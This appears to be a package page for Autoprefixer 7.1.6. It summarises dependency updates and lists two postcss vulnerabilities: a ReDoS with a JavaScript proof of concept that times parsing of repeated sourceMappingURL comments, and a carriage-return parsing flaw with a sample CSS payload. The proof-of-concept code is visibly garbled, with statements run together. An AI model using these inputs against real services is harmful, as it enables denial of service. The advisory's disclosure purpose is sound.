Autoprefixer version 7.1.6 represents a minor update to the widely-used CSS prefixing tool, building upon the foundation laid by version 7.1.5. The core functionality, centered around parsing CSS and automatically adding vendor prefixes based on Can I Use data, remains consistent. Key differences lie in the updated dependencies, offering developers subtle improvements and bug fixes. Specifically, browserslist has been bumped from version 2.5.0 to 2.5.1, potentially affecting browser target interpretation. More notably, caniuse-lite, the lifeblood of Autoprefixer's prefixing decisions, jumps from version 1.0.30000744 to 1.0.30000748. This indicates an updated database of browser compatibility data, empowering Autoprefixer to make more accurate and intelligent prefixing choices, ensuring better cross-browser compatibility for your stylesheets.
The development dependencies also see adjustments, particularly in linting and build tools. While these primarily impact maintainers and contributors, developers indirectly benefit from improved code quality and build processes. The upgrade to eslint from 4.8.0 to 4.9.0 and babel-preset-env from 1.6.0 to 1.6.1 suggests alignment with evolving JavaScript standards, potentially leading to more robust and maintainable code within the Autoprefixer library itself. Choosing version 7.1.6 offers developers the assurance of the most up-to-date browser compatibility data and incremental improvements across the development toolchain, ultimately contributing to more reliable and future-proof CSS.
All the vulnerabilities related to the version 7.1.6 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.